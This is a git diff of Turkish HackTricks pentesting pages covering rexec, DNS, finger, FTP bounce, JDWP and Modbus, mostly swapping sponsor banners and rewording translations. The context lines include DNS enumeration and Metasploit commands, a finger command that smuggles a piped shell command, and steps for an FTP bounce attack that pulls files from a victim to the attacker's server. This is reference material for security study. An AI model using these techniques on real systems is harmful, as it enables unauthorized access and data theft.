<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 429.597656 101.195312 C 426.597656 102.1875 423.371094 102.679688 419.933594 102.679688 C 415.503906 102.679688 412.292969 101.75 410.292969 99.886719 C 408.292969 98.03125 407.296875 95 407.296875 90.808594 L 407.296875 79.476562 L 401.363281 79.476562 L 401.363281 70.929688 L 407.296875 70.929688 L 407.296875 62.738281 L 419.039062 62.738281 L 419.039062 70.929688 L 428.292969 70.929688 L 428.292969 79.476562 L 419.039062 79.476562 L 419.039062 89.980469 C 419.039062 91.363281 419.386719 92.382812 420.078125 93.03125 C 420.769531 93.683594 421.890625 94.007812 423.425781 94.007812 C 424.734375 94.007812 426.3125 93.730469 428.171875 93.175781 L 429.597656 101.1875 Z M 429.597656 101.195312 "/>
<g clip-path="url(#clip2)" clip-rule="nonzero">
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(98.039216%,50.196078%,44.705882%);fill-opacity:1;" d="M 94.671875 53.417969 L 144.664062 66.070312 C 145.042969 65.535156 145.425781 65.007812 145.804688 64.476562 L 145.804688 64.460938 C 147.347656 62.273438 148.871094 60.058594 150.371094 57.835938 C 150.601562 57.496094 150.820312 57.15625 151.050781 56.816406 C 152.269531 55.003906 153.464844 53.175781 154.65625 51.339844 C 155.027344 50.765625 155.402344 50.183594 155.769531 49.601562 C 156.835938 47.933594 157.886719 46.25 158.933594 44.5625 C 159.300781 43.964844 159.671875 43.371094 160.039062 42.777344 C 161.394531 40.554688 162.738281 38.308594 164.0625 36.058594 L 164.332031 35.546875 L 162.542969 35.546875 C 156.15625 42.019531 148.746094 49.203125 141.851562 55.148438 L 94.671875 43.210938 L 42.761719 56.332031 L 43.703125 66.3125 Z M 94.671875 53.417969 "/>
</g>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(16.470588%,46.27451%,81.960784%);fill-opacity:1;" d="M 64.011719 149.238281 C 92.40625 127.675781 117.625 102.296875 139.085938 73.6875 L 94.671875 62.453125 L 44.652344 75.105469 L 47.867188 109.082031 C 49.273438 123.929688 54.976562 137.832031 64.019531 149.238281 Z M 64.011719 149.238281 "/>
<g clip-path="url(#clip3)" clip-rule="nonzero">
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 53.257812 170.839844 C 53.058594 170.992188 52.851562 171.152344 52.652344 171.304688 C 50.726562 172.78125 48.78125 174.234375 46.832031 175.671875 L 46.832031 176.871094 C 49.03125 176.007812 51.226562 175.128906 53.40625 174.21875 L 62.710938 170.175781 C 67.859375 167.84375 72.949219 165.390625 77.957031 162.816406 C 79.507812 163.976562 81.097656 165.09375 82.746094 166.140625 L 94.675781 173.742188 L 106.609375 166.140625 C 126.398438 153.515625 139.273438 132.464844 141.484375 109.089844 L 144.703125 75.113281 L 142.191406 74.476562 C 118.207031 111.519531 88.222656 144.023438 53.257812 170.839844 Z M 53.257812 170.839844 "/>
</g>
</g>
</svg>

Before

Width:  |  Height:  |  Size: 12 KiB

After

Width:  |  Height:  |  Size: 19 KiB

View file

@ -15,15 +15,15 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell açmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
## Temel Bilgiler
**Geçerli kimlik bilgilerini** (kullanıcı adı ve şifre) biliyorsanız, bir host içinde bir komut **çalıştırmanıza olanak tanıyan** bir hizmettir.
**Geçerli kimlik bilgilerini** (kullanıcı adı ve şifre) biliyorsanız, bir ana bilgisayar içinde bir komut **çalıştırmanıza olanak tanıyan** bir hizmettir.
**Varsayılan Port:** 512
```
@ -32,7 +32,7 @@ PORT STATE SERVICE
```
### [**Brute-force**](../generic-methodologies-and-resources/brute-force.md#rexec)
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.

View file

@ -15,9 +15,9 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ları değiştirmiyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -34,18 +34,18 @@ PORT STATE SERVICE REASON
```
### Farklı DNS Sunucuları
* **DNS Kök Sunucuları**: Bunlar DNS hiyerarşisinin en üstünde yer alır, üst düzey alan adlarını yönetir ve yalnızca alt düzey sunucular yanıt vermezse devreye girer. Atanan İsimler ve Numaralar için İnternet Kurumu (**ICANN**) onların işletimini denetler ve dünya genelinde 13 adet bulunmaktadır.
* **DNS Kök Sunucuları**: Bunlar DNS hiyerarşisinin en üstünde yer alır, üst düzey alan adlarını yönetir ve yalnızca alt düzey sunucular yanıt vermezse devreye girer. Atanan İsimler ve Numaralar için İnternet Kurumu (**ICANN**) bunların işletimini denetler ve dünya genelinde 13 adet bulunmaktadır.
* **Yetkili İsim Sunucuları**: Bu sunucular, belirlenen alanlarda sorgular için nihai karara sahiptir ve kesin yanıtlar sunar. Eğer yanıt veremezlerse, sorgu kök sunuculara yükseltilir.
* **Yetkisiz İsim Sunucuları**: DNS alanları üzerinde sahiplikleri olmayan bu sunucular, diğer sunuculara sorgular aracılığıyla alan bilgilerini toplar.
* **Önbellekli DNS Sunucusu**: Bu tür sunucular, önceki sorgu yanıtlarını belirli bir süre boyunca hatırlar ve gelecekteki talepler için yanıt sürelerini hızlandırır; önbellek süresi yetkili sunucu tarafından belirlenir.
* **Önbellekli DNS Sunucusu**: Bu tür sunucular, önceki sorgu yanıtlarını belirli bir süre boyunca hafızada tutarak gelecekteki talepler için yanıt sürelerini hızlandırır; önbellek süresi yetkili sunucu tarafından belirlenir.
* **Yönlendirme Sunucusu**: Basit bir rol üstlenen yönlendirme sunucuları, sorguları başka bir sunucuya iletir.
* **Çözümleyici**: Bilgisayarlar veya yönlendiriciler içinde entegre olan çözümleyiciler, ad çözümlemesini yerel olarak gerçekleştirir ve yetkili olarak kabul edilmezler.
* **Çözücü**: Bilgisayarlar veya yönlendiriciler içinde entegre olan çözücüler, ad çözümlemesini yerel olarak gerçekleştirir ve yetkili olarak kabul edilmezler.
## Sayım
### **Afiş Yakalama**
### **Afiş Alma**
DNS'te afiş yoktur ama `version.bind. CHAOS TXT` için sihirli sorguyu yakalayabilirsiniz; bu, çoğu BIND isim sunucusunda çalışacaktır.\
DNS'te afiş yoktur ama `version.bind. CHAOS TXT` için sihirli sorguyu alabilirsiniz; bu, çoğu BIND isim sunucusunda çalışacaktır.\
Bu sorguyu `dig` kullanarak gerçekleştirebilirsiniz:
```bash
dig version.bind CHAOS TXT @DNS
@ -58,7 +58,7 @@ Ayrıca, bir **nmap** betiği ile de banner'ı almak mümkündür:
```
### **Her kayıt**
Kayıt **ANY**, DNS sunucusundan **açıklamaya istekli olduğu** tüm mevcut **girişleri** **dönmesini** isteyecektir.
Kayıt **ANY**, DNS sunucusundan **açıklamaya istekli olduğu** tüm mevcut **girdileri** **geri döndürmesini** isteyecektir.
```bash
dig any victim.com @<DNS_IP>
```
@ -149,7 +149,7 @@ Alt alanların IPv6'sını toplamak için "AAAA" istekleri kullanarak kaba kuvve
```bash
dnsdict6 -s -t <domain>
```
IPv6 adresleri kullanarak ters DNS için bruteforce yapmak
IPv6 adreslerini kullanarak ters DNS için bruteforce yapmak
```bash
dnsrevenum6 pri.authdns.ripe.net 2001:67c:2e8::/48 #Will use the dns pri.authdns.ripe.net
```
@ -168,9 +168,9 @@ dig google.com A @<IP>
![](<../.gitbook/assets/image (146).png>)
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında mevcut kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell açmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında mevcut kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell açmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -180,8 +180,8 @@ Hedef alan içindeki geçersiz bir adrese gönderilen bir e-posta tarafından te
Sağlanan teslim edilmeme raporu aşağıdaki bilgileri içerir:
* Üretici sunucu `server.example.com` olarak tanımlandı.
* `user@example.com` için `#550 5.1.1 RESOLVER.ADR.RecipNotFound; bulunamadı` hata kodu ile bir hata bildirimi döndürüldü.
* Üretim sunucusu `server.example.com` olarak tanımlandı.
* `user@example.com` için `#550 5.1.1 RESOLVER.ADR.RecipNotFound; not found` hata kodu ile bir hata bildirimi döndürüldü.
* İç IP adresleri ve ana bilgisayar adları, orijinal mesaj başlıklarında ifşa edildi.
```markdown
The original message headers were modified for anonymity and now present randomized data:
@ -219,11 +219,11 @@ host.conf
Tehlikeli ayarlar bir Bind sunucusu yapılandırırken:
| **Seçenek** | **Açıklama** |
| ----------------- | ------------------------------------------------------------------------------ |
| ----------------- | ---------------------------------------------------------------------------- |
| `allow-query` | Hangi ana bilgisayarların DNS sunucusuna istek göndermesine izin verildiğini tanımlar. |
| `allow-recursion` | Hangi ana bilgisayarların DNS sunucusuna özyinelemeli istek göndermesine izin verildiğini tanımlar. |
| `allow-transfer` | Hangi ana bilgisayarların DNS sunucusundan alan transferi almasına izin verildiğini tanımlar. |
| `zone-statistics` | Alanların istatistik verilerini toplar. |
| `zone-statistics` | Alanların istatistiksel verilerini toplar. |
## Referanslar
@ -283,7 +283,7 @@ Description: DNS enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/dns/dns_amp; set RHOSTS {IP}; set RPORT 53; run; exit' && msfconsole -q -x 'use auxiliary/gather/enum_dns; set RHOSTS {IP}; set RPORT 53; run; exit'
```
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
@ -298,7 +298,7 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
<summary>HackTricks'i Destekleyin</summary>
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'ı takip edin.**
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter**'da **bizi takip edin** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
</details>

View file

@ -15,9 +15,9 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ları değiştirmiyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -71,7 +71,7 @@ finger "|/bin/ls -a /@example.com"
finger user@host@victim
finger @internal@external
```
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
@ -86,7 +86,7 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
<summary>HackTricks'i Destekleyin</summary>
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'ı takip edin.**
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter**'da **bizi takip edin** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
</details>

View file

@ -7,22 +7,22 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
<summary>HackTricks'i Destekleyin</summary>
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter**'da **bizi takip edin** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** bizi takip edin.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell açmaları ve eğlenmeleri için zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
# Özgeçmiş
Eğer bir bounce FTP sunucusuna erişiminiz varsa, diğer FTP sunucusundan \(bazı kimlik bilgilerini bildiğiniz yer\) dosyalar talep etmesini sağlayabilir ve bu dosyayı kendi sunucunuza indirebilirsiniz.
Eğer bir bounce FTP sunucusuna erişiminiz varsa, bu sunucunun diğer FTP sunucusundan \(bazı kimlik bilgilerini bildiğiniz yer\) dosya istemesini sağlayabilir ve bu dosyayı kendi sunucunuza indirebilirsiniz.
## Gereksinimler
@ -37,16 +37,16 @@ Eğer bir bounce FTP sunucusuna erişiminiz varsa, diğer FTP sunucusundan \(baz
1. Kendi FTP sunucunuza bağlanın ve bağlantıyı pasif hale getirin \(pasv komutu\) böylece kurban servisi dosyayı göndereceği bir dizinde dinlesin
2. FTP Orta sunucusunun Kurban sunucusuna göndereceği dosyayı oluşturun \(istismar\). Bu dosya, Kurban sunucusuna kimlik doğrulamak, dizini değiştirmek ve bir dosyayı kendi sunucunuza indirmek için gereken komutların düz metni olacaktır.
3. FTP Orta Sunucusuna bağlanın ve önceki dosyayı yükleyin
4. FTP Orta sunucusunun kurban sunucusu ile bir bağlantı kurmasını ve istismar dosyasını göndermesini sağlayın
5. Kendi FTP sunucunuzda dosyayı yakalayın
4. FTP Orta sunucusunun kurban sunucusuyla bir bağlantı kurmasını ve istismar dosyasını göndermesini sağlayın
5. Dosyayı kendi FTP sunucunuzda yakalayın
6. FTP Orta sunucusundan istismar dosyasını silin
Daha ayrıntılı bilgi için şu gönderiyi kontrol edin: [http://www.ouah.org/ftpbounce.html](http://www.ouah.org/ftpbounce.html)
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell açmaları ve eğlenmeleri için zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -59,7 +59,7 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
<summary>HackTricks'i Destekleyin</summary>
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter**'da **bizi takip edin** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** bizi takip edin.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
</details>

View file

@ -9,15 +9,15 @@ GCP Hacking öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" alt
<summary>HackTricks'i Destekleyin</summary>
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** bizi takip edin.**
* **Bize katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya **bizi** **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shellmaları ve eğlenmeleri için zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -54,9 +54,9 @@ I found that the use of `--break-on 'java.lang.String.indexOf'` make the exploit
- JDWP, keyfi sınıfları ve bytecode'u yüklemeye ve çağırmaya izin verir, bu da güvenlik riskleri oluşturur.
- Makale, Java Runtime referanslarını alma, kesme noktaları ayarlama ve yöntemleri çağırma gibi beş adımda bir sömürü sürecini detaylandırmaktadır.
5. **Gerçek Hayat Sömürüsü**:
5. **Gerçek Hayatta Sömürü**:
- Potansiyel güvenlik duvarı korumalarına rağmen, JDWP hizmetleri keşfedilebilir ve gerçek dünya senaryolarında sömürülebilir, bu da ShodanHQ ve GitHub gibi platformlarda yapılan aramalarla gösterilmektedir.
- Sömürü betiği çeşitli JDK sürümlerine karşı test edilmiştir ve platformdan bağımsızdır, güvenilir Uzaktan Kod Çalıştırma (RCE) sunar.
- Sömürü betiği çeşitli JDK sürümlerine karşı test edilmiştir ve platformdan bağımsızdır, güvenilir Uzaktan Kod Çalıştırma (RCE) sunmaktadır.
6. **Güvenlik Etkileri**:
- İnternette açık JDWP hizmetlerinin varlığı, düzenli güvenlik incelemeleri yapma, üretimde hata ayıklama işlevlerini devre dışı bırakma ve uygun güvenlik duvarı yapılandırmalarının gerekliliğini vurgular.
@ -76,9 +76,9 @@ I found that the use of `--break-on 'java.lang.String.indexOf'` make the exploit
* [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html](http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html)
* [http://nmap.org/nsedoc/scripts/jdwp-exec.html](http://nmap.org/nsedoc/scripts/jdwp-exec.html)
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için zaman kazandırmak amacıyla özel araçlar, tespit ve sömürü modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve sömürü modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

View file

@ -13,16 +13,16 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Güvenlik değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Güvenlik değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
# Temel Bilgiler
1979'da **Modbus Protokolü**, Modicon tarafından geliştirilmiştir ve bir mesajlaşma yapısı olarak hizmet vermektedir. Ana kullanımı, akıllı cihazlar arasında iletişimi kolaylaştırmaktır; bu, bir master-slave/client-server modeli altında çalışır. Bu protokol, cihazların verileri verimli bir şekilde değiştirmesine olanak tanıyan kritik bir rol oynamaktadır.
1979'da **Modbus Protokolü**, Modicon tarafından geliştirilmiş olup, bir mesajlaşma yapısı olarak hizmet vermektedir. Temel kullanımı, akıllı cihazlar arasında iletişimi kolaylaştırmaktır ve bu, bir master-slave/client-server modeli altında çalışır. Bu protokol, cihazların verileri verimli bir şekilde değiştirmesine olanak tanıyan kritik bir rol oynamaktadır.
**Varsayılan port:** 502
```
@ -41,9 +41,9 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
<details>
